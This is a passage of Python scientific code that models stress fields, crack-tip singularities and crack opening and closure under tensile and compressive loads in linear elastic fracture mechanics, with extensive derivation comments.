sigmaI_theta0_times_rootr_over_sqrta_over_sigmaext: # ((1/sqrt(meters))*meters + sqrt(meters) ) / sqrt(meters) # = unitless (check) return sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext def eval_ModeI_COD_per_unit_stress_vectorized(self,x,xt): # we are using weightfunctions # New implementation with weight functions: # m = (E'/2K) du/da (Anderson, Fracture Mechanics, eq. 2.50 and Rice (1972) eq. 13 # u = integral_x..xt (2K/E') m(x,a) da # u = integral_x..xt (2K/E') M(x,a)/sqrt(a-x) da # need K... well from above K_I(a) = sigma_ext * [ integral_0^(a-epsilon) M(u,a)/sqrt(a-u) du + M(a,a)*2sqrt(epsilon) ] # u = (2.0/E') * integral_x..xt K_I(a) M(x,a)/sqrt(a-x) da # u = (2.0/E') * [ integral_x..(x+epsilon) K_I(a) M(x,a)/sqrt(a-x) da + integral_(x+epsilon)..xt K_I(a) M(x,a)/sqrt(a-x) da ] # u = (2.0/E') * [ K_I(x) M(x,x) integral_x..(x+epsilon) 1.0/sqrt(a-x) da + integral_(x+epsilon)..xt K_I(a) M(x,a)/sqrt(a-x) da ] # # as above we can evaluate the left hand integral to be 2*sqrt(epsilon) # so # u = (2.0/E') * [ K_I(x) M(x,x) 2*sqrt(epsilon) + integral_(x+epsilon)..a K_I(a) M(x,a)/sqrt(a-x) da ] # # NOTE: POSSIBLE PROBLEM... Should be dependent on nu? (Poisson's ratio?) right_integral = lambda _x : scipy.integrate.quad(lambda a: self.K_I_ov_sigma_ext_use(a)*self.weightfun_times_sqrt_aminx(self,_x,a)/np.sqrt(a-_x),_x+self.epsx,xt)[0] right_integral_vect = np.vectorize(right_integral) u_per_unit_stress = (2.0/self.Eeff) * ( self.K_I_ov_sigma_ext_use(x)*self.weightfun_times_sqrt_aminx(self,x,x)*2.0*np.sqrt(self.epsx) + right_integral_vect(x)) return u_per_unit_stress pass def indef_integral_of_simple_squareroot_quotients(a,u): """ This routine is no longer used because integrated out to infinity the form of solution kernel that goes with this fails load balancing... See indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,xt) for the replacement""" (a,u) = np.broadcast_arrays(a,u) # make sure a and u are the same shape # From Wolfram Alpha: integral of (sqrt(u)/sqrt(a-u)) du # = a*arctan(sqrt(u)/sqrt(a-u)) - sqrt(u)*sqrt(a-u) #if (a==u).any(): # raise ValueError("Divide by zero") # return a*arctan(sqrt(u)/sqrt(a-u)) - sqrt(u)*sqrt(a-u) # Calculate division-by-zero and # non division-by-zero regimes separately # Limiting case as a-u -> 0: # Let v = a-u -> u = a-v # integral = a*arctan(sqrt(a-v)/sqrt(v)) - sqrt(a-v)*sqrt(v) # Per wolfram alpha: limit as v approaches 0 + of a*atan(sqrt(a-v)/sqrt(v)) # = pi*a/2.0 divzero = (a==u) | ((np.abs(a-u) < 1e-10*a) & (np.abs(a-u) < 1e-10*u)) #if np.count_nonzero(a < u) > 0: # import pdb # pdb.set_trace() # pass integral = np.zeros(a.shape[0],dtype='d') integral[~divzero] = a[~divzero]*arctan(sqrt(u[~divzero])/sqrt(a[~divzero]-u[~divzero])) - sqrt(u[~divzero])*sqrt(a[~divzero]-u[~divzero]) integral[divzero] = np.pi*a[divzero]/2.0 return integral def indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,xt): """ This is the indefinite integral of the crack tip stress solution for an open linear elastic crack. ___ / \/x_t / r0 \2 | --===- * |--------| dx_t / \/ r \(r + r0)/ where r is implicitly defined as x - x_t and r0 as b*x_t. The first factor represents the standard sqrt(a) divided by the square root of the radius away from the crack decay that is found in standard crack tip stress solutions e.g. Anderson (2004), and Tada (2000). However, this alone does not accurate account for the load balance in of the load that would have been carried by half of the crack surface and the load that would be added ahead of the crack tip. There is presumed to be another constant term outside this integral matching the load at infinity. The second factor in the integral represents additional decay of the 1/sqrt(r) singularity which, combined with the outside constant term) enforces the load balance of the stress state as r is integrated to infinity. This function of r0 complicates the integral because not only is r = x - x_t a function of x_t (the variable of integration), r0 is also a function of x_t (r0 is presumed to have the form constant*x_t, where this constant will be refered to as b=r0_over_a). The resulting integral is: ___ / \/x_t / b*x_t \2 | --=======- * |-------------------| dx_t / \/x - x_t \((x - x_t) + b*x_t)/ The function inputs are: crack_model - contains the values describing the particular 1/sqrt(r) LEFM tip model desired, including a function returning the r0_over_a value needed for the integral. The assumption is that r0_over_a, even though it is given parameters including x_t, is not actually dependent on x_t. If there is dependence on x_t then this solution is not correct (but may be close enough for practical purposes). x - the x value or range along the crack that the evaluated integral is being calculated over, not the variable of integration xt - the value or range of half crack length that the indefinite integral is being evaluated at This function then returns the indefinite integral evaluated at (x,x_t) """ (x,xt) = np.broadcast_arrays(x,xt) # make sure x and xt are the same shape #From Wolfram Alpha: # integrate ((sqrt(u))/(sqrt(a-u)))*((b*u)/((a-u)+b*u))^2 du = #Plain-Text Wolfram Alpha output # (b^2 (-(((-1 + b) Sqrt[a - u] Sqrt[u] (a (1 + b) + (-1 + b) b u))/(b # (a + (-1 + b) u))) + a (-5 + b) ArcTan[Sqrt[u]/Sqrt[a - u]] + (a (-1 + # 5 b) ArcTan[(Sqrt[b] Sqrt[u])/Sqrt[a - u]])/b^(3/2)))/(-1 + b)^3 #where b*u = r0 --> b = r0_over_a, u = xt, and a = x # Calculate division-by-zero and # non division-by-zero regimes separately # Limiting case as x-xt -> 0: # Let r = x-xt -> xt = x-r # # The limit approaches ((b**2)/(b-1)**3)*(pi/2.0)*((x*(5*b-1)/(b**(3./2.))) # +(x*(b-5))) as r->0 divzero = (x==xt) | ((np.abs(x-xt) < 1e-10*x) & (np.abs(x-xt) < 1e-10*xt)) #if np.count_nonzero(x < xt) > 0: # import pdb # pdb.set_trace() # pass b = crack_model.r0_over_a(xt) f1=sqrt(xt[~divzero]) f2=sqrt(x[~divzero]-xt[~divzero]) A=((b**2)/(b-1)**3) B=((x[~divzero]*(5*b-1)*arctan((sqrt(b)*f1)/(f2)))/(b**(3./2.))) C=((b-1)*(f1)*(f2)*(x[~divzero]*(b+1)+(b-1)*b*xt[~divzero])) D=(b*(x[~divzero]+(b-1)*xt[~divzero])) E=(x[~divzero]*(b-5)*arctan(f1/f2)) integral = np.zeros(x.shape,dtype='d') integral[~divzero] =A*(B-(C/D)+E) integral[divzero] = ((b**2)/(b-1)**3)*(pi/2.0)*x[divzero]*(((5*b-1)/(b**(3./2.)))+(b-5)) return integral def integral_tensilestress_growing_effective_crack_length_byxt(x,sigmaext1,sigmaext_max,F,xt1,xt2,crack_model): """ Evaluate the incremental normal stress field on a mode I crack that is growing in effective length from xt1 to xt2 due to an external load (previous value sigmaext1, limiting value sigmaext_max) It is assumed that the effective tip moves linearly with applied external normal stress, with rate given by F (Pascals of external normal stress / meters of tip motion The external normal stress is presumed to be bounded by sigmaext_max (which may be np.Inf to leave it unbounded). In such a case it will evaluate the incremental normal stress only up to the length that gives sigmaext_max. Returns (use_xt2,sigmaext2,res) where use_xt2 is the actual upper bound of the integration (as limited by sigmaext_max), sigmaext2 is the external tensile stress load corresponding to the crack being opened to use_xt2, and which will be <= to sigmaext_max. Rationale: The mode I normal stress formula is: sigma_yy_crack = (K_I / sqrt(2*pi*r)) (Suresh, Eq. 9.44a at theta=0) ... we choose to add in the external field not being held by the crack and a decay factor from load balancing (see below) sigma_yy_total = (K_I / sqrt(2*pi*r))*(r0^2/(r+r0)^2) + sigma_ext In the region where the stress accumulates, to the right of the tip, the origin of the K_I is almost irrelevant. So we can use this formula even for different geometries/loading conditions. Using the weight function to find K, K_I = integral_0^a (sigma_ext(x) m(x,a) dx) For uniform loading, sigma_ext = independent of x, therefore K_I = sigma_ext * integral_0^a m(x,a) dx ... now m(x,a) has the form M(x,a)/sqrt(a-x) M(x,a) is weightfun_times_sqrt_aminx Break the integral into two pieces: K_I = sigma_ext * [ integral_0^(a-epsilon) M(x,a)/sqrt(a-x) dx + integral_(a-epsilon)^a M(x,a)/sqrt(a-x) dx ] Evaluate the left hand integral with quadrature integration. Evaluate the right hand integral analytically: integral_(a-epsilon)^a M(x,a)/sqrt(a-x) dx Treat M(x,a) as constant M(a,a) over the small region = M(a,a) * integral_(a-epsilon)^a 1/sqrt(a-x) dx Let u = a-x : du=-dx = M(a,a) * -integral_epsilon^0 u^(-1/2) du = M(a,a) * -2u^(1/2) |_epsilon^0 = M(a,a) * 2epsilon^(1/2) = 2 sqrt(epsilon) So K_I = sigma_ext * [ integral_0^(a-epsilon) M(x,a)/sqrt(a-x) dx + M(a,a)*2sqrt(epsilon) ] Now K_I/sigmaext = [ integral_0^(a-epsilon) M(x,a)/sqrt(a-x) dx + M(a,a)*2sqrt(epsilon) ] Let K_over_sigmaext = K_I/sigmaext From above. sigma_yy_crack = (K_I / sqrt(2*pi*r)) ... Call sigma_yy_crack/sigmaext now sigmaI and make it a function of r=x-xt and K_I/sigmaext So sigmaI(r,K_I/sigmaext) = K_over_sigmaext / sqrt(2*pi*(x-xt)) Let xt be the position of the effective tip at external load sigmaext The incremental normal stress field would be integral_sigmaext1^sigmaext2 of 1.0 + sigmaI(x-xt,K_over_sigmaext) dsigmaext (note that K and xt are dependent on sigmaext) The variable sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext represents the value of sigmayy_crack(x,K) with the above formula for K_I (either from the weight function or the simple K_I=sigma_ext*sqrt(pi*a)) substituted for K, evaluated for horizontal axis beyond the tip (i.e. theta=0) and then multiplied by sqrt(r) (sqrt(position beyond the tip) and divided by sqrt(cracklength) and also by sigmaext. So sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = ([ integral_0^(a-epsilon) M(x,a)/sqrt(a-x) dx + M(a,a)*2sqrt(epsilon) ] / (sqrt(2*pi*a))) Then we can rewrite the incremental normal stress as: integral_sigmaext1^sigmaext2 of sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*sqrt(xt)/sqrt(x-xt) dsigmaext if the entire stress field is presumed to come from the crack tip singularity. Here, xt is still dependent on sigmaext... sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext also has some dependence on a (i.e. xt), but as xt isn't moving much this is presumed to be small if we assume that a long way from the effective tip the stress is unform, we add 1.0 into the integral integral_sigmaext1^sigmaext2 of 1.0 + sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*sqrt(xt)/sqrt(x-xt) dsigmaext From force balancing (see total_load_matching.pdf) but using a (r0^2/(r+r0)^2) decay factor (see total_load_matching_crossterm_r2_work.pdf) we can apply that decay factor to the singular term, integral_sigmaext1^sigmaext2 of 1.0 + (r0^2/(r+r0)^2)*sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*sqrt(xt)/sqrt(x-xt) dsigmaext Here r is defined as sqrt(x-xt), and r0 -- evaluated per the above .pdfs -- is 8*xt/(pi^2*beta) (through crack, beta typically 1) or (2^(1/3))*xt/(pi^(2/3)*beta^(1/3)) (half penny surface crack, beta typically 4/(pi^2). ... because r and r0 are functions of xt, they are implicitly dependent on xt and need to be considered in the integration. this will give normal stress as a function of position (x). We assume xt is linearly dependent on normal stress: xt = xtp + (1/F)*(sigmaext-sigmaext1) where xtp is the final xt from the previous step. sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext is treated as constant, between xt1 and xt2 So our incremental tension is integral_sigmaext1^sigmaext2 (1.0 + sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext r0^2/(r+r0)^2 * sqrt(xt)/sqrt(x-xt)) dsigmaext where we ignore any contributions corresponding to (x-xt) <= 0 (the 1.0 term represents that beyond the effective tip the external load directly increments the stress state, in addition to the stress concentration caused by the presence of the open region; the r0^2/(r+r0)^2 actor makes the stress concentration integrate to the right load -- with r0 (proportional to xt) selected on that basis as discussed above and in the previously mentioned .pdfs. representing r0 as r0_over_xt*xt, and r by x-xt, the r0^2/(r+r0)^2 factor becomes r0_over_xt^2*xt^2/(x-xt+r0_over_xt*xt)^2 pull out constant term (sigmaext2-sigmaext1) + integral_sigmaext1^sigmaext2 sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext r0_over_xt^2*xt^2/(x-xt+r0_over_xt*xt)^2 * sqrt(xt)/sqrt(x-xt) dsigmaext Perform change of integration variable sigmaext -> xt: Derivative of xt: dxt = (1/F)*dsigmaext dsigmaext = F*dxt So the incremental normal stress we are solving for is (sigmaext2-sigmaext1) + integral_xt1^xt2 sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext r0_over_xt^2*xt^2/(x-xt+r0_over_xt*xt)^2 sqrt(xt)*F/sqrt(x-xt) dxt where we ignore any contributions corresponding to (x-xt) <= 0 and sigmaext2 = sigmaext1 + (xt2-xt1)*F F is a constant and sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext is treated as constant so have F*(xt2-xt1) + F * sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext * integral_xt1^xt2 r0_over_xt^2*xt^2/(x-xt+r0_over_xt*xt)^2 sqrt(xt)/(sqrt(x-xt)) dxt The right hand term is then the integral of r0_over_xt^2*xt^2/(x-xt+r0_over_xt*xt)^2 * (sqrt(xt)/sqrt(x-xt)) dxt with solution to the indefinite integral given by indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,xt) so the definite integral is given by indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,xt2) - indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,xt1) Well almost. We only consider the region of this integral where x-xt > 0. This can be accomplished by shifting the bounds when needed. x > xt => xt2 < x and xt1 < x ... xt1 < xt2 So: Integral = 0 where x < xt1 Integral upper bound = x where xt1 < x < xt2 Integral upper bound = xt2 where x > xt2 indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,upper_bound) - indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,xt1) So our actual solution putting everything together is: 0 where x < xt1 otherwise: upper_bound = min(x, xt2) F*(upper_bound-xt1) + (sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*F)*(indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,upper_bound) - indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,xt1)) """ # For a mode I tension crack with the tip at the origin, intact material # to the right (x > 0), broken material to the left (x < 0) # The tensile stress @ theta=0 multiplied by sqrt(x)/(sqrt(a)*sigmaext) # where x ( > 0) is the position where the stress is measured, # a is the (half) length of the crack, and sigmaext # is the external tensile load sigmaext2 = sigmaext1 + (xt2-xt1)*F #print("sigmaext1 = %g; sigmaext2=%g; sigmaext_max=%g; xt1=%g; xt2=%g; F=%g" % (sigmaext1,sigmaext2,sigmaext_max,xt1,xt2,F)) use_xt2 = xt2 if sigmaext2 > sigmaext_max: # bound sigmaext by sigmaext_max... by limiting xt2 if F > 0: use_xt2 = xt1 + (sigmaext_max-sigmaext1)/F pass if F==0 or use_xt2 > xt2: use_xt2 = xt2 pass sigmaext2 = sigmaext_max pass #print("use_xt2 = %g" % (use_xt2)) upper_bound = use_xt2*np.ones(x.shape,dtype='d') # alternate upper_bound: use_alternate = x < upper_bound upper_bound[use_alternate] = x[use_alternate] res=np.zeros(x.shape,dtype='d') nonzero = x > xt1 xtavg = (xt1+use_xt2)/2.0 sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = crack_model.eval_sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext(xtavg) # KI/(sigma_ext*sqrt(a)) # evaluated from basic formula: # KI = sigma_ext * sqrt(pi*a) from Suresh # KI/(sigma_ext*sqrt(a)) = sqrt(pi) = 1.77 # KI/(sigma_ext*sqrt(a)) # evaluated via basic weightfunction: # KI/(sigma_ext*sqrt(a)) = (integral of the weightfunction from -a..a)/(sigma_ext*sqrt(a)) # # For basic weightfunction from Fett and Munz: # m = sqrt(1/(pi*a)) * sqrt(a+x)/sqrt(a-x) # This would be: (1/(a*sqrt(pi))) integral_-a^a sqrt(a+x)/sqrt(a-x) dx # let u = x/a; du = dx/a -> dx=a*du # This would be: (1/(a*sqrt(pi))) integral_-1^1 sqrt(a+au)/sqrt(a-au) a*du # This would be: (1/(sqrt(pi))) integral_-1^1 sqrt(1+u)/sqrt(1-u) du # ... = (1/sqrt(pi)) * pi = sqrt(pi) by wolfram alpha ... CHECK! # This is the (integral of the weightfunction from 0..a)/sqrt(2*pi*a) # For basic weightfunction: sqrt(1/(pi*a)) * sqrt(a+x)/sqrt(a-x) # This would be: (1/(a*pi*sqrt(2))) integral_0^a sqrt(a+x)/sqrt(a-x) dx # let u = x/a; du = dx/a -> dx=a*du # This would be: (1/(a*pi*sqrt(2))) integral_0^1 sqrt(a+au)/sqrt(a-au) a*du # This would be: (1/(pi*sqrt(2))) integral_0^1 sqrt(1+u)/sqrt(1-u) du # ... = (2+pi)/(2*pi*sqrt(2))... = .578 by wolfram alpha # ... or a factor of (2+pi)/(2*pi)=.818 smaller than the .707 # of the simple formula # old version that fails load balance #res[nonzero] = F*(upper_bound[nonzero]-xt1) + (sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*F) * (indef_integral_of_simple_squareroot_quotients(x[nonzero],upper_bound[nonzero]) - indef_integral_of_simple_squareroot_quotients(x[nonzero],xt1)) res[nonzero] = F*(upper_bound[nonzero]-xt1) + (sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*F) * (indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x[nonzero],upper_bound[nonzero]) - indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x[nonzero],xt1)) return (use_xt2,sigmaext2,res) def integral_compressivestress_shrinking_effective_crack_length_byxt(x,sigmaext1,sigmaext_max,F,xt1,xt2,crack_model): """ Like integral_tensilestress_growing_effective_crack_length_byxt() but for compression. """ # sigmaext1 is starting load (negative for compression) # sigmaext_max is limit load (negative for compression) # sigmaext2 is the ending load (negative for compression, # more negative than sigmaext1 # For a mode I tension crack with the tip at the origin, intact material # to the right (x > 0), broken material to the left (x < 0) # The tensile stress @ theta=0 multiplied by sqrt(x)/(sqrt(a)*sigmaext) # where x ( > 0) is the position where the stress is measured, # a is the (half) length of the crack, and sigmaext # is the external tensile load # ... F is positive sigmaext2 = sigmaext1 - (xt2-xt1)*F #print("sigmaext1 = %g; sigmaext2=%g; sigmaext_max=%g; xt1=%g; xt2=%g; F=%g" % (sigmaext1,sigmaext2,sigmaext_max,xt1,xt2,F)) use_xt1 = xt1 if sigmaext2 < sigmaext_max: # bound sigmaext by sigmaext_max... by limiting xt1 if F > 0: use_xt1 = xt2 + (sigmaext_max-sigmaext1)/F pass if F==0 or use_xt1 < xt1: use_xt1 = xt1 pass sigmaext2 = sigmaext_max pass #print("use_xt1 = %g" % (use_xt1)) upper_bound = xt2*np.ones(x.shape,dtype='d') nonzero = x > use_xt1 # alternate upper_bound: use_alternate = x < upper_bound upper_bound[use_alternate] = x[use_alternate] res=np.zeros(x.shape,dtype='d') xtavg = (use_xt1+xt2)/2.0 sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = crack_model.eval_sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext(xtavg) # KI/(sigma_ext*sqrt(a)) # evaluated from basic formula: # KI = sigma_ext * sqrt(pi*a) from Suresh # KI/(sigma_ext*sqrt(a)) = sqrt(pi) = 1.77 # KI/(sigma_ext*sqrt(a)) # evaluated via basic weightfunction: # KI/(sigma_ext*sqrt(a)) = (integral of the weightfunction from -a..a)/(sigma_ext*sqrt(a)) # # For basic weightfunction from Fett and Munz: # m = sqrt(1/(pi*a)) * sqrt(a+x)/sqrt(a-x) # This would be: (1/(a*sqrt(pi))) integral_-a^a sqrt(a+x)/sqrt(a-x) dx # let u = x/a; du = dx/a -> dx=a*du # This would be: (1/(a*sqrt(pi))) integral_-1^1 sqrt(a+au)/sqrt(a-au) a*du # This would be: (1/(sqrt(pi))) integral_-1^1 sqrt(1+u)/sqrt(1-u) du # ... = (1/sqrt(pi)) * pi = sqrt(pi) by wolfram alpha ... CHECK! # This is the (integral of the weightfunction from 0..a)/sqrt(2*pi*a) # For basic weightfunction: sqrt(1/(pi*a)) * sqrt(a+x)/sqrt(a-x) # This would be: (1/(a*pi*sqrt(2))) integral_0^a sqrt(a+x)/sqrt(a-x) dx # let u = x/a; du = dx/a -> dx=a*du # This would be: (1/(a*pi*sqrt(2))) integral_0^1 sqrt(a+au)/sqrt(a-au) a*du # This would be: (1/(pi*sqrt(2))) integral_0^1 sqrt(1+u)/sqrt(1-u) du # ... = (2+pi)/(2*pi*sqrt(2))... = .578 by wolfram alpha # ... or a factor of (2+pi)/(2*pi)=.818 smaller than the .707 # of the simple formula # old version that fails load balance #res[nonzero] = -F*(upper_bound[nonzero]-use_xt1) - (sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*F) * (indef_integral_of_simple_squareroot_quotients(x[nonzero],upper_bound[nonzero]) - indef_integral_of_simple_squareroot_quotients(x[nonzero],use_xt1)) res[nonzero] = -F*(upper_bound[nonzero]-use_xt1) - (sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*F) * (indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x[nonzero],upper_bound[nonzero]) - indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x[nonzero],use_xt1)) return (use_xt1,sigmaext2,res) def solve_incremental_tensilestress(x,x_bnd,sigma,sigma_closure,tensile_displ,xt_idx,dx,sigmaext,sigmaext_max,a,crack_model,calculate_displacements=True): """The overall crack opening constraint is that (tensile load on crack surface) > 0 to open For a through-crack of thickness h, short segment of width dx sigma*h*dx - sigma_closure*h*dx > 0 (where sigma represents the total local stress field increment due to the external load and sigma_closure represents the closure stresses prior to such increment (positive for compression)) or equivalently sigma > sigma_closure (where sigma_closure is positive (i.e. compressive)) Consider an increment in position dx. Assume from previous steps we have a superimposed sigma(x) in the plane of the crack. In this step we are adding an increment to sigma_external. Stresses accumulate strictly to the right of the effective tip. The rule for the crack to remain closed is that (the preexisting sigma(x) + the increment in sigma(x)) <= sigma_closure Here, given the preexisting sigma(x), sigma_closure(x), and an increment of opening the crack by one unit of dx, we are evaluating the increment in sigma(x) as well as the increment in sigma_external We can evaluate the increment in sigma from: (use_xt2,sigmaext2,sigma_increment)=integral_tensilestress_growing_effective_crack_length_byxt(x,sigmaext,sigmaext_max,F,x[xt_idx],x[xt_idx+1],weightfun_times_sqrt_aminx,weightfun_epsx) But to do this we need to solve for F. We do this by setting the tensile normal stress equal to the closure stress over the new step (unit of dx). """ next_bound = x_bnd[xt_idx+1] if next_bound > a: next_bound=a pass def obj_fcn(F): (use_xt2,sigmaext2,sigma_increment)=integral_tensilestress_growing_effective_crack_length_byxt(x,sigmaext,np.inf,F,x_bnd[xt_idx],next_bound,crack_model) #print("obj_fcn return %g" % ((sigma+sigma_increment - sigma_closure)[xt_idx])) return (sigma+sigma_increment - sigma_closure)[xt_idx] # F measures the closure gradient in (Pascals external tensile stress / meters of tip motion) if sigma_closure[xt_idx] >= 0.0 and sigma[xt_idx] < sigma_closure[xt_idx]: # There is a closure stress here but not yet the full external tensile load to counterbalance it # !!!*** Can shortcut most of this calculation in 99% of cases # by solving directly for F under assumption that delta sigma infinity # will not exceed our limit. Then the code below would only # be needed for the rare case that we are reaching our load limit # and cannot actually open crack up to next increment # ***!!! # Bound it by 0 and the F that will give the maximum # contribution of sigma_increment: 2.0*(sigmaext_max-sigmaext1)/(xt2-xt1) if np.isinf(sigmaext_max): if sigmaext != 0.0: Fbnd = 2.0*(sigmaext)/(next_bound-x_bnd[xt_idx]) pass else: Fbnd = 2.0*(20e6)/(next_bound-x_bnd[xt_idx]) pass pass else: Fbnd = 2.0*(sigmaext_max - sigmaext)/(next_bound-x_bnd[xt_idx]) pass # Increase Fbnd until we get a positive result from obj_fcn while Fbnd != 0.0 and obj_fcn(Fbnd) < 0.0: Fbnd*=2.0; pass # Condition below should only occur when Fbnd==0.0, i.e. when sigmaext_max==sigmaext, or if the objective is already satisfied if Fbnd == 0.0 or obj_fcn(Fbnd) <= 0.0: # Maximum value of objective is < 0... This means that # with the steepest sigma vs. xt slope possible (given # the total tensile load we are applying) we still # can't get sigma+sigma_increment to match sigma_closure. # ... We will have to make do with sigma+sigma_increment # < sigma_closure # So our best result is just Fbnd F=Fbnd #print("obj_fcn(Fbnd) returns %g; obj_fcn(200*Fbnd) returns %g" % (obj_fcn(Fbnd),obj_fcn(200*Fbnd))) pass else: # brentq requires function to be different signs # at 0.0 (negative) and Fbnd (positive) F = scipy.optimize.brentq(obj_fcn,0.0,Fbnd,disp=True) pass (use_xt2,sigmaext2,sigma_increment)=integral_tensilestress_growing_effective_crack_length_byxt(x,sigmaext,sigmaext_max,F,x_bnd[xt_idx],next_bound,crack_model) #print("F=%g" % (F)) #print("use_xt2=%f" % (use_xt2)) assert(use_xt2 <= a) # For displacement calculate at x centers... use average of left and right boundaries, except for (perhaps) last point where instead of the right boundary we use the actual tip. if calculate_displacements: incremental_displacement = np.zeros(x.shape[0],dtype='d') xt = (x_bnd[xt_idx]+use_xt2)/2.0 left_of_effective_tip = (x < xt) incremental_displacement[left_of_effective_tip] = tensile_displacement(sigmaext2-sigmaext,x[left_of_effective_tip],xt,crack_model) pass pass else: # No closure stress at this point, or sigma is already at the limit # of what can be supported here # ... just open up to the next spot use_xt2 = x_bnd[xt_idx+1] if use_xt2 > a: # Cannot open beyond tips use_xt2 = a pass sigmaext2 = sigmaext sigma_increment = np.zeros(x.shape[0],dtype='d') incremental_displacement = np.zeros(x.shape[0],dtype='d') pass if calculate_displacements: ret_displ = tensile_displ+incremental_displacement pass else: ret_displ=None pass dsigmaext_dxt = (sigmaext2-sigmaext)/(x_bnd[xt_idx+1]-x_bnd[xt_idx]) #print("dsigmaext_dxt=%g" % (dsigmaext_dxt)) return (use_xt2,sigmaext2, sigma+sigma_increment, ret_displ, dsigmaext_dxt) def solve_incremental_compressivestress(x,x_bnd,sigma,sigma_closure,tensile_displ,use_xt2,xt_idx,dx,sigmaext,sigmaext_max,a,sigma_yield,crack_model,calculate_displacements=True): """Like solve_incremental_tensilestress but for negative sigmaext and sigmaext_max """ next_bound = x_bnd[xt_idx] if next_bound < 0.0: next_bound=0.0 pass def obj_fcn(F): (use_xt1,sigmaext2,sigma_increment)=integral_compressivestress_shrinking_effective_crack_length_byxt(x,sigmaext,-np.inf,F,next_bound,use_xt2,crack_model) #print("obj_fcn return %g" % ((sigma+sigma_increment - sigma_closure)[xt_idx])) return (sigma+sigma_increment - sigma_closure)[xt_idx] #if use_xt2 >= 1.43216e-3 and use_xt2 <= 1.4572e-3: # print("Problem spot!") # sys.modules["__main__"].__dict__.update(globals()) # sys.modules["__main__"].__dict__.update(locals()) # raise ValueError("Problem") # pass # F measures the closure gradient in (Pascals external tensile stress / meters of tip motion) if sigma_closure[xt_idx] <= 0.0 and sigma[xt_idx] > sigma_closure[xt_idx]: # There is not the full external compressive load to close the crack here... # Bound it by 0 and the F that will give the maximum # contribution of sigma_increment: 2.0*(sigmaext_max-sigmaext1)/(xt2-xt1) # (F is positive, in general... next_bound is smaller than use_xt2) if np.isinf(sigmaext_max): # sigmaext_max is -inf when we are closing the crack all the way to find out opening displacement Fbnd = 2.0*(-sigma_yield)/(next_bound-use_xt2) pass else: Fbnd = 2.0*(sigmaext_max - sigmaext)/(next_bound-use_xt2) pass # Increase Fbnd until we get a negative result from obj_fcn while Fbnd != 0.0 and obj_fcn(Fbnd) > 0.0: Fbnd*=2.0; pass # Condition below should only occur when Fbnd==0.0, i.e. when sigmaext_max==sigmaext, or if the objective is already satisfied if Fbnd ==0.0 or obj_fcn(Fbnd) >= 0.0: # Maximum value of objective is < 0... This means that # with the steepest sigma vs. xt slope possible (given # the total tensile load we are applying) we still # can't get sigma+sigma_increment to match sigma_closure. # ... We will have to make do with sigma+sigma_increment # < sigma_closure # So our best result is just Fbnd F=Fbnd #print("obj_fcn(Fbnd) returns %g; obj_fcn(200*Fbnd) returns %g" % (obj_fcn(Fbnd),obj_fcn(200*Fbnd))) pass else: # brentq requires function to be different signs # at 0.0 (negative) and Fbnd (positive) F = scipy.optimize.brentq(obj_fcn,0.0,Fbnd,disp=True) pass (use_xt1,sigmaext2,sigma_increment)=integral_compressivestress_shrinking_effective_crack_length_byxt(x,sigmaext,sigmaext_max,F,next_bound,use_xt2,crack_model) #print("use_xt1=%f" % (use_xt1)) assert(use_xt1 >= 0.0) # For displacement calculate at x centers... use average of left and right boundaries, except for (perhaps) last point where instead of the right boundary we use the actual tip. if calculate_displacements: incremental_displacement = np.zeros(x.shape[0],dtype='d') xt = (use_xt1+use_xt2)/2.0 left_of_effective_tip = (x < xt) incremental_displacement[left_of_effective_tip] = tensile_displacement(sigmaext2-sigmaext,x[left_of_effective_tip],xt,crack_model) pass pass else: # This region has enough stress to close # ... just close it up to the next spot use_xt1 = next_bound if use_xt1 < 0.0: # Cannot close beyond the center use_xt1 = 0.0 pass sigmaext2 = sigmaext sigma_increment = np.zeros(x.shape[0],dtype='d') incremental_displacement = np.zeros(x.shape[0],dtype='d') pass if calculate_displacements: ret_displ = tensile_displ+incremental_displacement pass else: ret_displ=None pass # Limit compressive stresses at physical tip (and elsewhere) to yield sigma_increment[sigma + sigma_increment < -sigma_yield] = -sigma_yield-sigma[sigma+sigma_increment < -sigma_yield] #assert((sigma+sigma_increment <= 0.0).all()) dsigmaext_dxt = (sigmaext2-sigmaext)/(x_bnd[xt_idx+1]-x_bnd[xt_idx]) return (use_xt1,sigmaext2, sigma+sigma_increment, 